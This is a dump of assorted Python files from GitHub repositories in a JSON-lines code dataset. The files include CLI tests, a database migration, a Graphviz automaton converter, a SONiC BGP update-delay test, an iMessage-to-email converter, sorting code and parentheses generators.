result.output\n assert result.output.startswith('Account #')\n assert result.output.count('\\n') >= 3\n\n\ndef test_balance(runner):\n \"\"\"Test invoking the script 'balance' subcommand\"\"\"\n result = runner.invoke(\n cli, args=['balance'],\n )\n\n assert result.exit_code == 0\n assert result.output\n assert result.output.startswith('Balance:')\n\n\ndef test_transactions(runner):\n \"\"\"Test invoking the script 'transactions' subcommand\"\"\"\n for n in [1, 5, 10]:\n result = runner.invoke(\n cli, args=['transactions', '-n', str(n)],\n )\n\n assert result.exit_code == 0\n assert result.output\n # Each item takes 3 lines plus a blank one, no new line at the end\n assert result.output.count('\\n') == (n*4 - 1)\n","repo_name":"pawelad/monz","sub_path":"monz/test/test_command_line.py","file_name":"test_command_line.py","file_ext":"py","file_size_in_byte":2116,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"51"} +{"seq_id":"43898547044","text":"\"\"\"empty message\n\nRevision ID: 38d17971ab3b\nRevises: ddf3072ef4bd\nCreate Date: 2018-04-24 17:17:35.902475\n\n\"\"\"\nfrom alembic import op\nimport sqlalchemy as sa\n\n\n# revision identifiers, used by Alembic.\nrevision = '38d17971ab3b'\ndown_revision = 'ddf3072ef4bd'\nbranch_labels = None\ndepends_on = None\n\n\ndef upgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n op.drop_constraint(u'follows_userID_fkey', 'follows', type_='foreignkey')\n op.drop_constraint(u'follows_followerID_fkey', 'follows', type_='foreignkey')\n op.drop_constraint(u'likes_userID_fkey', 'likes', type_='foreignkey')\n op.drop_constraint(u'likes_postID_fkey', 'likes', type_='foreignkey')\n op.drop_constraint(u'posts_userID_fkey', 'posts', type_='foreignkey')\n # ### end Alembic commands ###\n\n\ndef downgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n op.create_foreign_key(u'posts_userID_fkey', 'posts', 'users', ['userID'], ['id'])\n op.create_foreign_key(u'likes_postID_fkey', 'likes', 'posts', ['postID'], ['id'])\n op.create_foreign_key(u'likes_userID_fkey', 'likes', 'users', ['userID'], ['id'])\n op.create_foreign_key(u'follows_followerID_fkey', 'follows', 'users', ['followerID'], ['id'])\n op.create_foreign_key(u'follows_userID_fkey', 'follows', 'users', ['userID'], ['id'])\n # ### end Alembic commands ###\n","repo_name":"omarchristie/info3180-project2","sub_path":"migrations/versions/38d17971ab3b_.py","file_name":"38d17971ab3b_.py","file_ext":"py","file_size_in_byte":1363,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"} +{"seq_id":"41310721320","text":"#!/usr/bin/env python3\n# coding: utf-8\n\n\nimport re\nfrom pprint import pprint\nimport sys\n\ndef sprint_dot(fa):\n\n ret = ''\n\n ret += '''digraph G {\n graph [charset=\"UTF-8\"];\n rankdir=LR;\n'''\n \n ret += ' label=\"{title}\";\\n'.format(\n title=fa[\"title\"])\n \n ret += \"\\n\";\n \n def str_arrow(arrow):\n str_edge = \" {node1:<8} -> {node2:<8}\".format(\n node1=arrow[\"node1\"], node2=arrow[\"node2\"])\n \n if arrow[\"edge\"]:\n str_atr = ' [label=\"{edge}\"];'.format(\n edge=arrow[\"edge\"]) if arrow[\"edge\"] else \"\"\n return str_edge + str_atr\n \n return str_edge\n \n ret += \"\\n\".join(( str_arrow(arrow) for arrow in fa[\"arrows\"] ))\n \n ret += \"\\n\";\n \n for node in fa[\"final_nodes\"]:\n ret += ' {node:<8} [shape=doublecircle rank=max];\\n'.format(node=node)\n \n ret += ' {node:<8} [shape=none rank=max];\\n'.format(node='start')\n\n ret += \"}\\n\"\n\n return ret\n\ndef get_node(txt):\n _match = re.compile('^([\\w]+)\\[F\\]$').search(txt)\n if _match:\n name = _match.group(1)\n is_final = True\n else:\n name = txt\n is_final = False\n \n return {\n \"name\": name,\n \"is_final\": is_final,\n }\n \nif __name__ == '__main__':\n if len(sys.argv) > 1:\n in_file = sys.argv[1]\n else:\n in_file = './sample/sample_fa.txt'\n \n re_title = re.compile('^\\s*title\\s*:\\s*(\\S(?:.*\\S)?)$')\n re_node_edge = re.compile('''\n ^\\s*\n ([\\w\\[\\]]+) # node1\n \\s*\n -(?:([\\w,\\[\\]]+)-|)> # edge\n ( # remain\n \\s*\n ([\\w\\[\\]]+) # node2\n (?:\n \\s*\n -(?:[\\w+,\\[\\]]-|)>\n \\s*\n (?:[\\w\\[\\]]+)\n )*\n )\n \\s*$\n ''', re.VERBOSE)\n \n fa = {\n \"title\":'',\n \"arrows\":[],\n \"final_nodes\":[]\n }\n\n with open(in_file, 'r') as f:\n for line in ( l.rstrip() for l in f):\n if re.compile('^\\s*#').search(line):\n continue\n \n if re.compile('^\\s*$').search(line):\n continue\n\n _match = re_title.search(line)\n if _match:\n fa[\"title\"] = _match.group(1)\n continue\n \n _line = line\n _match = re_node_edge.search(_line)\n if _match:\n while _match:\n node1 = get_node(_match.group(1))\n edge = _match.group(2)\n node2 = get_node(_match.group(4))\n _line = _match.group(3)\n fa[\"arrows\"].append({\n \"node1\" : node1[\"name\"],\n \"edge\" : edge,\n \"node2\" : node2[\"name\"],\n })\n \n for node in ( node for node in ( node1, node2 ) if node[\"is_final\"]):\n fa[\"final_nodes\"].append(node[\"name\"])\n \n _match = re_node_edge.search(_line)\n \n continue\n print(sprint_dot(fa))\n\n\n","repo_name":"megmeg1974/fa_graphviz","sub_path":"fa.py","file_name":"fa.py","file_ext":"py","file_size_in_byte":3349,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"} +{"seq_id":"41467257723","text":"import json\n\nfile_in = \"50K_corr.txt\" # вида p_idartisttitle\nfile_out = \"50K_better.txt\"\n\n\n# если в плейлисте хотя бы 5 песен, отправлять его в новый файл,\n# при этом убрав из названий (, [ и /, в тегах их не бывает обычно\n\n\ndef better_title(title):\n\n if (title.find(\"(\") != -1):\n title = title.split(\"(\")[0]\n\n if (title.find(\"[\") != -1):\n title = title.split(\"[\")[0]\n\n if (title.find(\"/\") != -1):\n title = title.split(\"/\")[0]\n\n\n return title\n\n\n\n\nf = open(file_in, 'r')\nf_out = open(file_out, 'w')\n\np_id_old = \"\"\ncnt = 0\nlines = []\n\n\nfor line in f:\n tab_sep = line.split('\\t')\n p_id = tab_sep[0]\n #artist = tab_sep[1]\n #title = tab_sep[2].split('\\n')[0]\n\n if (p_id == p_id_old): # просто копить\n cnt += 1\n lines.append(line)\n\n else: # менять старый, считать сколько накопилось, править строчки и записывать\n\n if (cnt > 4):\n for track in lines:\n t_sep = track.split('\\t')\n t_p_id = t_sep[0]\n artist = t_sep[1]\n artist = artist.replace(\"/\", \"\")\n title = t_sep[2].split('\\n')[0]\n title = better_title(title)\n new_line = p_id + \"\\t\" + artist + \"\\t\" + title\n\n f_out.write(new_line)\n f_out.write(\"\\n\")\n\n cnt = 0\n p_id_old = p_id\n lines = []","repo_name":"cscenter/automatic-playlist-generation","sub_path":"DataSetCreator/set_process.py","file_name":"set_process.py","file_ext":"py","file_size_in_byte":1618,"program_lang":"python","lang":"ru","doc_type":"code","stars":5,"dataset":"github-code","pt":"51"} +{"seq_id":"1899243534","text":"# Insertion sort is stable and in-place.\n# Its complexity is O(n^2) in the worst case and O(n) in the best case.\n\nimport random\n\ndef insertion_sort(my_list):\n \"\"\" Sort a list using the insertion sort \"\"\"\n \n # Start at the second element (pos 1).\n # Use this element to insert into the list.\n for key_pos in range(1, len(my_list)):\n \n # Get the value of the element to insert\n key_value = my_list[key_pos]\n \n # Scan from right to the left (start of list)\n scan_pos = key_pos - 1\n \n # Loop each element, moving them up until\n # we reach the position the\n while (scan_pos >= 0) and (my_list[scan_pos] > key_value):\n my_list[scan_pos + 1] = my_list[scan_pos]\n scan_pos = scan_pos - 1\n \n # Everything's been moved out of the way, insert\n # the key into the correct location\n my_list[scan_pos + 1] = key_value\n \n\ndef print_list(my_list):\n for item in my_list:\n print(\"{:3}\".format(item), end = \"\")\n print()\n \n# Testing --------------------------------------------------------------------\ndef main():\n my_list = []\n for i in range(10):\n my_list.append(random.randrange(100))\n \n # Try out the sort\n print_list(my_list)\n insertion_sort(my_list)\n print_list(my_list)\n\nif __name__ == '__main__':\n main()","repo_name":"LarsIndus/algorithms-DS","sub_path":"sorting/insertion_sort.py","file_name":"insertion_sort.py","file_ext":"py","file_size_in_byte":1347,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"} +{"seq_id":"3909838264","text":"import contextlib\nimport ipaddress\nimport logging\nimport pytest\nimport tempfile\nimport time\n\nfrom datetime import datetime\n\nfrom scapy.all import IP\nfrom scapy.all import IPv6\nfrom scapy.all import sniff\nfrom scapy.contrib import bgp\n\nfrom tests.common.helpers.assertions import pytest_assert\nfrom tests.common.utilities import wait_until\n\n\npytestmark = [\n pytest.mark.topology(\"dualtor\")\n]\nBGP_LOG_TMPL = \"/tmp/bgp_neighbor_%s.pcap\"\n\n\n@contextlib.contextmanager\ndef log_bgp_updates(duthost, iface, save_path):\n \"\"\"Capture bgp packets to file.\"\"\"\n if iface == \"any\":\n # Scapy doesn't support LINUX_SLL2 (Linux cooked v2), and tcpdump on Bullseye\n # defaults to writing in that format when listening on any interface. Therefore,\n # have it use LINUX_SLL (Linux cooked) instead.\n start_pcap = \"tcpdump -y LINUX_SLL -i %s -w %s port 179\" % (iface, save_path)\n else:\n start_pcap = \"tcpdump -i %s -w %s port 179\" % (iface, save_path)\n # for multi-asic dut, add 'ip netns exec asicx' to the beggining of tcpdump cmd\n stop_pcap = \"sudo pkill -SIGINT -f '%s'\" % start_pcap\n start_pcap = \"nohup {} &\".format(start_pcap)\n duthost.shell(start_pcap)\n try:\n yield\n finally:\n duthost.shell(stop_pcap, module_ignore_errors=True)\n\n\n@pytest.fixture(params=[\"ipv4\", \"ipv6\"])\ndef ip_version(request):\n return request.param\n\n\n@pytest.fixture\ndef select_bgp_neighbor(ip_version, duthost):\n config_facts = duthost.get_running_config_facts()\n\n for bgp_neighbor, neighbor_details in list(config_facts[\"BGP_NEIGHBOR\"].items()):\n bgp_neighbor_addr = ipaddress.ip_address(bgp_neighbor)\n is_ipv4_neighbor = isinstance(bgp_neighbor_addr, ipaddress.IPv4Address)\n if ip_version == \"ipv4\" and is_ipv4_neighbor:\n break\n elif ip_version == \"ipv6\" and not is_ipv4_neighbor:\n break\n else:\n raise ValueError(\"Failed to find\")\n\n return bgp_neighbor, neighbor_details\n\n\n@pytest.fixture(autouse=True)\ndef restore_bgp_sessions(duthost):\n yield\n\n duthost.shell(\"config bgp startup all\")\n\n\ndef test_dualtor_bgp_update_delay(duthost, ip_version, select_bgp_neighbor):\n \"\"\"\n This testcase aims to validate that, for a dualtor T0, after startup BGP sessions,\n it should always sleep for 10 seconds delay before sending out any BGP updates.\n And the BGP updates come from T1s should comes earlier than the BGP update to the T1s,\n so the T0 could always have default route ready before T1 learns any route from T0.\n \"\"\"\n\n def verify_bgp_session(duthost, bgp_neighbor, admin, state):\n bgp_facts = duthost.bgp_facts()[\"ansible_facts\"][\"bgp_neighbors\"]\n return bgp_neighbor in bgp_facts and bgp_facts[bgp_neighbor][\"admin\"] == admin \\\n and bgp_facts[bgp_neighbor][\"state\"] == state\n\n def bgp_update_packets(pcap_file):\n \"\"\"Get bgp update packets from pcap file.\"\"\"\n packets = sniff(\n offline=pcap_file,\n lfilter=lambda p: ip_packet in p and bgp.BGPHeader in p and p[bgp.BGPHeader].type == 2\n )\n return packets\n\n bgp_neighbor, bgp_details = select_bgp_neighbor\n local_address = bgp_details[\"local_addr\"]\n ip_packet = IP if ip_version == \"ipv4\" else IPv6\n\n logging.info(\"shutdown BGP %s\", bgp_neighbor)\n duthost.shell(\"config bgp shutdown neighbor %s\" % bgp_neighbor)\n pytest_assert(\n wait_until(10, 2, 2, verify_bgp_session, duthost, bgp_neighbor, \"down\", \"idle\"),\n \"Could not shutdown neighbor %s\" % bgp_neighbor\n )\n\n logging.info(\"startup BGP %s\", bgp_neighbor)\n bgp_pcap = BGP_LOG_TMPL % bgp_neighbor\n with log_bgp_updates(duthost, \"any\", bgp_pcap):\n startup_ret = duthost.shell(\"config bgp startup neighbor %s\" % bgp_neighbor)\n pytest_assert(\n wait_until(10, 2, 2, verify_bgp_session, duthost, bgp_neighbor, \"up\", \"established\"),\n \"Could not startup neighbor %s\" % bgp_neighbor\n )\n\n time.sleep(20)\n\n bgp_startup_time = datetime.strptime(startup_ret['end'], \"%Y-%m-%d %H:%M:%S.%f\")\n logging.debug(\"BGP neighbor is started at %s\", bgp_startup_time)\n\n with tempfile.NamedTemporaryFile() as tmp_pcap:\n duthost.fetch(src=bgp_pcap, dest=tmp_pcap.name, flat=True)\n duthost.file(path=bgp_pcap, state=\"absent\")\n bgp_updates = bgp_update_packets(tmp_pcap.name)\n\n first_update_to_peer = None\n first_update_from_peer = None\n for bgp_update in bgp_updates:\n if bgp_update[ip_packet].src == bgp_neighbor and bgp_update[ip_packet].dst == local_address:\n # update from peer\n if first_update_from_peer is None:\n first_update_from_peer = bgp_update\n elif bgp_update[ip_packet].src == local_address and bgp_update[ip_packet].dst == bgp_neighbor:\n # update to peer\n if first_update_to_peer is None:\n first_update_to_peer = bgp_update\n\n pytest_assert(\n first_update_from_peer is not None,\n \"Could not find any BGP updates from %s\" % bgp_neighbor\n )\n pytest_assert(\n first_update_to_peer is not None,\n \"Could not find any BGP updates to %s\" % bgp_neighbor\n )\n\n first_update_to_peer_time = datetime.fromtimestamp(first_update_to_peer.time)\n first_update_from_peer_time = datetime.fromtimestamp(first_update_from_peer.time)\n pytest_assert(\n (first_update_to_peer_time - bgp_startup_time).total_seconds() >= 10,\n \"There should be at least 10 seconds of delay between startup BGP session and the first out BGP update\"\n )\n pytest_assert(\n first_update_to_peer_time > first_update_from_peer_time,\n \"Dualtor T0 should receive BGP update from peer first\"\n )\n","repo_name":"sonic-net/sonic-mgmt","sub_path":"tests/dualtor_mgmt/test_dualtor_bgp_update_delay.py","file_name":"test_dualtor_bgp_update_delay.py","file_ext":"py","file_size_in_byte":5743,"program_lang":"python","lang":"en","doc_type":"code","stars":161,"dataset":"github-code","pt":"51"} +{"seq_id":"32646476026","text":"from django.db import models\nfrom django.core.validators import MinLengthValidator\nfrom .validators import check_name_only_letters\n\n# Create your models here.\nclass Fruit(models.Model):\n\n name = models.CharField(\n max_length=30,\n validators=[MinLengthValidator(2), check_name_only_letters],\n blank=False,\n null=False\n )\n\n image = models.URLField(\n blank=False,\n null=False\n )\n\n description = models.TextField(\n blank=False,\n null=False\n )\n\n nutrition = models.TextField(\n blank=True,\n null=True\n )\n","repo_name":"BorislavRaynov/Fruitipedia","sub_path":"fruitipedia/fruit/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":592,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"} +{"seq_id":"4826383052","text":"import sys\nfrom time import perf_counter\n\n#recursive weight_on function for the human pyramid\ndef weight_on(r,c): \n #count the number of times the function is called\n weight_on.counter += 1\n #if the row and column is 0, means the top position, return 0\n if r == 0 and c == 0:\n return 0\n #if the column is 0, means the left position, return the weight on the back of the person in row r-1 and and column c\n elif c == 0:\n return (weight_on(r-1,0) +200)/2.0\n #if the column is r, means the right position, return the weight on the back of the person in row r-1 and and column c-1\n elif c == r:\n return (weight_on(r-1,c-1) +200)/2.0\n #if the column is neither 0 nor r, means the middle position, return the sum of weight on the back of the person in row r-1 and and column c-1 and the weight on the back of the person in row r-1 and and column c\n else:\n return (weight_on(r-1,c-1) +200)/2.0 + (weight_on(r-1,c) +200)/2.0\n#print the number of function calls\nweight_on.counter = 0\n\ndef main():\n #get the number of rows\n rows = int(input(\"Enter the number of rows: \"))\n #start the timer\n start_time = perf_counter()\n #save and write the output to a file named part2.out\n sys.stdout = open(\"part2.out\", \"w\")\n #loop through the rows \n for r in range(0, rows):\n #loop through the columns\n for c in range(0, r+1):\n #print the weight\n print(\"{:5.1f}\".format(weight_on(r,c)), end=\" \")\n #print a new line\n print()\n #end the timer\n end_time = perf_counter()\n #calculate the time\n elapsed_time = end_time - start_time\n print(\"Elapsed time: {:.3f} seconds\".format(elapsed_time))\n print(\"Number of function calls: {}\".format(weight_on.counter))\n #close the file\n sys.stdout.close()\n\nif __name__ == \"__main__\":\n main()","repo_name":"dwk601/CS-1410","sub_path":"Human Pyramid/pyramid_rec.py","file_name":"pyramid_rec.py","file_ext":"py","file_size_in_byte":1858,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"} +{"seq_id":"71342600160","text":"#!/usr/bin/env python\n\n\"\"\"The setup script.\"\"\"\n\nfrom setuptools import setup, find_packages\n\nwith open('README.rst') as readme_file:\n readme = readme_file.read()\n\nwith open('HISTORY.rst') as history_file:\n history = history_file.read()\n\nrequirements = [ ]\n\nsetup_requirements = [ ]\n\ntest_requirements = [ ]\n\nsetup(\n author=\"Chandrasekhar Ramakrishnan\",\n author_email='cramakrishnan@gmail.com',\n python_requires='>=3.6',\n classifiers=[\n 'Development Status :: 2 - Pre-Alpha',\n 'Intended Audience :: Developers',\n 'License :: OSI Approved :: BSD License',\n 'Natural Language :: English',\n 'Programming Language :: Python :: 3',\n 'Programming Language :: Python :: 3.6',\n 'Programming Language :: Python :: 3.7',\n 'Programming Language :: Python :: 3.8',\n ],\n description=\"Utility functions for the intro to data viz notebooks.\",\n install_requires=requirements,\n license=\"BSD license\",\n long_description=readme + '\\n\\n' + history,\n include_package_data=True,\n keywords='introviz',\n name='introviz',\n packages=find_packages(include=['introviz', 'introviz.*']),\n setup_requires=setup_requirements,\n test_suite='tests',\n tests_require=test_requirements,\n url='https://github.com/ciyer/introviz',\n version='0.1.0',\n zip_safe=False,\n)\n","repo_name":"ciyer/intro-data-viz","sub_path":"src/python/introviz/setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":1346,"program_lang":"python","lang":"en","doc_type":"code","stars":10,"dataset":"github-code","pt":"51"} +{"seq_id":"18407665811","text":"# import cv2\n# import numpy as np\n#\n# img = cv2.imread('image/cross4.jpg')\n# gray = cv2.cvtColor(img,cv2.COLOR_BGR2GRAY)\n# edges = cv2.Canny(gray,50,220)\n#\n# lines = cv2.HoughLines(edges,1,np.pi/180,200)\n#\n# print(lines)\n#\n# # for rho,theta in lines[2]:\n# for line in lines:\n# for rho, theta in line:\n# print(rho, theta)\n# a = np.cos(theta)\n# b = np.sin(theta)\n# x0 = a*rho\n# y0 = b*rho\n# x1 = int(x0 + 1000*(-b))\n# y1 = int(y0 + 1000*(a))\n# x2 = int(x0 - 1000*(-b))\n# y2 = int(y0 - 1000*(a))\n#\n# print(x1,y1,x2,y2)\n# cv2.line(img,(x1,y1),(x2,y2),(0,0,255),2)\n# #\n# cv2.imshow('out', img)\n# cv2.waitKey()\n#\n\nimport numpy as np\nimport cv2 as cv\nfrom matplotlib import pyplot as plt\nimg = cv.imread('image/cross4.jpg')\ngray = cv.cvtColor(img,cv.COLOR_BGR2GRAY)\ncorners = cv.goodFeaturesToTrack(gray,25,0.01,10)\ncorners = np.int0(corners)\nl = np.array([])\nfor j, i in enumerate(corners):\n x,y = i.ravel()\n cv.circle(img,(x,y),3,255,-1)\n cv.putText(img, f\"{j}\", (x,y), cv.FONT_HERSHEY_SIMPLEX, .4, 255)\nplt.imshow(img),plt.show()\nprint(l)","repo_name":"Wanchatpookhuntod/checkExam","sub_path":"line.py","file_name":"line.py","file_ext":"py","file_size_in_byte":1135,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"} +{"seq_id":"6268247386","text":"# imessage_to_mime.py - Convert imessage dictionary to MIME\n#\n# Stephen Fegan - sfegan@gmail.com - 2017-02-28\n#\n# This program is motivated by the author's experience of SMSBackup+ under\n# Android, an excellent application to backup SMS/MMS messages to GMail where\n# they can be searched etc. This little program tries to do the same thing for\n# messages / conversations stored in the iMessage database.\n#\n# This program is free software: you can redistribute it and/or modify\n# it under the terms of the GNU General Public License as published by\n# the Free Software Foundation, either version 3 of the License, or\n# (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program. If not, see .\n\nimport email.mime.base\nimport email.mime.text\nimport email.mime.image\nimport email.mime.audio\nimport email.mime.multipart\nimport email.utils\nimport email.encoders\nimport email.charset\nimport email.header\nimport email\nimport hashlib\nimport copy\n#import BytesIO\n\nemail.charset.Charset('utf-8').body_encoding = email.charset.QP\nemail.charset.Charset('utf-8').header_encoding = email.charset.QP\n\nXheader_base = 'X-imessagesync-'\ndef Xheader(ext): return Xheader_base + ext\nXheader_guid = Xheader('guid')\nmessage_id_fqdn = '@imessage_sync.local'\n\ndef get_handle_name(handle, addressbook):\n name = addressbook.lookup_name(handle)\n if(name is None):\n name = handle['contact']\n return name\n\ndef get_chat_contacts(chat):\n return ','.join(map(lambda h: h['contact'], chat['handles']))\n\ndef get_chat_names(chat, addressbook):\n names = sorted(map(lambda h: get_handle_name(h, addressbook), chat['handles']))\n if(len(names) > 1):\n s = ', '.join(names[0:-1])\n s += ' and ' + names[-1]\n return s\n else:\n return names[0]\n\ndef get_subject(message, addressbook):\n return 'Chat with ' + get_chat_names(message['chat'], addressbook)\n\ndef make_email_header(all_emails):\n h = email.header.Header()\n if(type(all_emails[0]) is not list):\n all_emails = [ all_emails ]\n first = True\n for one_email in all_emails:\n if(not first):\n h.append(', ')\n first = False\n h.append(one_email[0])\n h.append('<' + one_email[1] + '>')\n return h\n\ndef get_from(message, addressbook):\n if(message['is_from_me']):\n return make_email_header(addressbook.me())\n elif(not message['handle'] is None):\n return make_email_header(addressbook.lookup_email(message['handle']))\n elif(not message['other_handle'] is None):\n return make_email_header(addressbook.lookup_email(message['other_handle']))\n else:\n return make_email_header(['Unknown person', 'unknown@unknown.email'])\n pass\n\ndef get_to(message, addressbook):\n th = []\n if(message['is_from_me']):\n th = list(map(addressbook.lookup_email, message['chat']['handles']))\n else:\n fh = None\n if(not message['handle'] is None):\n fh = message['handle']\n elif(not message['other_handle'] is None):\n fh = message['other_handle']\n th = [ addressbook.me() ]\n if(message['chat'] and message['chat']['handles']):\n for to in map(addressbook.lookup_email,\n filter(lambda h: h != fh, message['chat']['handles'])):\n th.append(to)\n return make_email_header(th)\n\ndef get_rfc3501_id(id):\n return '<'+id+message_id_fqdn+'>'\n\ndef get_message_id(message):\n return get_rfc3501_id(message['guid'])\n\ndef get_chat_id(chat, addressbook):\n id = hashlib.sha1(get_chat_names(chat, addressbook).encode()).hexdigest()\n return get_rfc3501_id(id)\n\ndef get_text_msg(message):\n text = message['text']\n try:\n text.encode('us-ascii')\n except:\n msg = email.mime.text.MIMEText('', _charset='utf-8')\n msg.replace_header('content-transfer-encoding', 'quoted-printable')\n msg.set_payload(text, 'utf-8')\n return msg\n return email.mime.text.MIMEText(text, _charset='us-ascii')\n\ndef get_attachment_msg(attachment):\n if(not attachment['mime_type']):\n return None\n path = attachment['filename']\n maintype, subtype = attachment['mime_type'].split('/')\n fp = None\n if(path):\n try:\n fp = open(path, 'r' if maintype=='text' else 'rb')\n except:\n fp = None\n if(fp is None):\n return email.mime.text.MIMEText('Attachment \"%s\" not found on server'%\n attachment['raw_filename'])\n if maintype == 'text':\n # Note: we should handle calculating the charset\n msg = email.mime.text.MIMEText(fp.read(), _subtype=subtype)\n fp.close()\n elif maintype == 'image':\n msg = email.mime.image.MIMEImage(fp.read(), _subtype=subtype)\n fp.close()\n elif maintype == 'audio':\n msg = email.mime.audio.MIMEAudio(fp.read(), _subtype=subtype)\n fp.close()\n else:\n msg = email.mime.base.MIMEBase(maintype, subtype)\n msg.set_payload(fp.read())\n fp.close()\n # Encode the payload using Base64\n email.encoders.encode_base64(msg)\n if(attachment.get('transfer_name') and attachment.get('created_date')):\n msg.add_header('Content-Disposition', 'attachment',\n creation_date=email.utils.formatdate(attachment['created_date']),\n filename=attachment['transfer_name'])\n elif(attachment.get('transfer_name')):\n msg.add_header('Content-Disposition', 'attachment',\n filename=attachment['transfer_name'])\n elif(attachment.get('created_date')):\n msg.add_header('Content-Disposition', 'attachment',\n creation_date=email.utils.formatdate(attachment['created_date']))\n return msg\n\ndef is_valid(message):\n return (message.get('chat') is not None and \\\n len(message['chat']['handles'])>0 and \\\n (message['is_from_me']==True or message.get('handle') is not None or message.get('other_handle') is not None) and \\\n (message['text'] is not None or len(message['attachments'])>0))\n\ndef set_headers(outer, message, addressbook, in_reply_to, sync_time=None):\n outer['Subject'] = email.header.Header(get_subject(message, addressbook))\n outer['To'] = get_to(message, addressbook)\n outer['From'] = get_from(message, addressbook)\n outer['Date'] = email.utils.formatdate(message['date'])\n outer['Message-ID'] = get_message_id(message)\n chat_id = get_chat_id(message['chat'], addressbook)\n if(chat_id in in_reply_to):\n outer['In-Reply-To'] = in_reply_to[chat_id]\n outer['References'] = chat_id + ' ' + in_reply_to[chat_id]\n else:\n outer['References'] = chat_id\n outer[Xheader_guid] = message['guid']\n #outer[Xheader('chat-guid')] = message['chat']['guid']\n outer[Xheader('contacts')] = \\\n ' '.join(map(lambda h: h['contact'], message['chat']['handles']))\n outer[Xheader('my-contact')] = \\\n message['chat']['last_addressed_handle']\n outer[Xheader('service')] = message['service']\n if(message.get('account') and message['account'] != 'e:'):\n outer[Xheader('account')] = message['account']\n if(message['date_delivered'] and message['is_delivered']):\n outer[Xheader('date-delivered')] = \\\n email.utils.formatdate(message['date_delivered'])\n if(message['date_read'] and message['is_read']):\n outer[Xheader('date-read')] = \\\n email.utils.formatdate(message['date_read'])\n if(not message['is_from_me'] and message['handle']):\n outer[Xheader('from-contact')] = message['handle']['contact']\n# outer[Xheader('handle-country')] = message['handle']['country']\n# outer[Xheader('handle-service')] = message['handle']['service']\n if(sync_time):\n outer[Xheader('upload-date')] = \\\n email.utils.formatdate(sync_time)\n\ndef get_email(message, addressbook, in_reply_to = dict(), max_attachment_size = None, sync_time = None):\n if(message['attachments']):\n emails = []\n outer = email.mime.multipart.MIMEMultipart()\n set_headers(outer, message, addressbook, in_reply_to, sync_time)\n outer.preamble = 'You will not see this in a MIME-aware email reader.\\n'\n outer.attach(get_text_msg(message))\n attachments = []\n for a in message['attachments']:\n attachments.append(get_attachment_msg(a))\n if(max_attachment_size is not None and max_attachment_size > 0):\n total_asize = 0\n for ia, a in enumerate(attachments):\n if(not a):\n continue\n asize = len(a.as_bytes())\n if(asize > max_attachment_size):\n a = email.mime.text.MIMEText('Attachment \"%s\" suppressed due to '\n 'file-size constraints'%message['attachments'][ia]['raw_filename'])\n asize = len(a.as_bytes())\n elif(total_asize + asize > max_attachment_size):\n outer[Xheader('fragment')] = str(len(emails))\n emails.append(outer)\n new_message = copy.copy(message)\n new_message['guid'] = \\\n message['guid'] + '-FRAGMENT-' + str(len(emails))\n outer = email.mime.multipart.MIMEMultipart()\n set_headers(outer, new_message, addressbook, in_reply_to, sync_time)\n outer.preamble = 'You will not see this in a MIME-aware email reader.\\n'\n total_asize = 0\n outer.attach(a)\n total_asize += asize\n else:\n for a in attachments:\n if(a):\n outer.attach(a)\n if(emails):\n outer[Xheader('fragment')] = str(len(emails))\n emails.append(outer)\n return emails\n else:\n return outer\n else:\n outer = get_text_msg(message)\n set_headers(outer, message, addressbook, in_reply_to, sync_time)\n return outer\n\ndef update_chat_thread_ids(message, addressbook, in_reply_to):\n chat_id = get_chat_id(message['chat'], addressbook)\n in_reply_to[chat_id] = get_message_id(message)\n","repo_name":"sfegan/imessage_sync","sub_path":"imessage_to_mime.py","file_name":"imessage_to_mime.py","file_ext":"py","file_size_in_byte":10581,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"51"} +{"seq_id":"21452552255","text":"import time\n\n\ndef timing(func):\n def wrapper(*args, **kwargs):\n t1 = time.time()\n res = func(*args, **kwargs)\n t2 = time.time()\n result = t2 - t1\n print(f\"Func {func.__name__} took {result:.9f} sec.\")\n return res\n\n return wrapper\n\n\ndef generate_parentheses1(n):\n \"\"\"the slowest\"\"\"\n if n == 0:\n return [\"\"]\n result = []\n for i in range(n):\n left = generate_parentheses1(i)\n\n right = generate_parentheses1(n - i - 1)\n\n for l in left:\n for r in right:\n result.append(\"(\" + l + \")\" + r)\n return sorted(result)\n\n\n@timing\ndef run_gen1(n):\n generate_parentheses1(n)\n\n\nrun_gen1(14)\n\n\n@timing\ndef generate_parentheses2(n):\n output = []\n\n def rec(left, right, stack, candidate):\n if left == right == 0:\n output.append(candidate)\n return\n if left > 0:\n rec(left - 1, right, stack + 1, candidate + \"(\")\n if right > 0 and stack > 0:\n rec(left, right - 1, stack - 1, candidate + \")\")\n\n rec(n, n, 0, candidate=\"\")\n return output\n\n\ng = generate_parentheses2(15)\n\n\n@timing\ndef generate_parentheses3(n) -> None:\n out = []\n\n def run(current: str, opened: int, closed: int, n: int):\n if len(current) == 2 * n:\n out.append(current)\n return\n if opened < n:\n run(current + \"(\", opened + 1, closed, n)\n if closed < opened:\n run(current + \")\", opened, closed + 1, n)\n\n run(\"\", 0, 0, n)\n return out\n\n\ng = generate_parentheses3(14)\nprint(len(g))\n\n\nres = []\n\n\ndef generate_parentheses4(current: str, opened: int, closed: int, n: int):\n \"\"\"just printout algorithm\"\"\"\n if len(current) == 2 * n:\n res.append(current)\n return\n if opened < n:\n generate_parentheses4(current + \"(\", opened + 1, closed, n)\n if closed < opened:\n generate_parentheses4(current + \")\", opened, closed + 1, n)\n\n\n@timing\ndef run_gen4(n):\n generate_parentheses4(\"\", 0, 0, 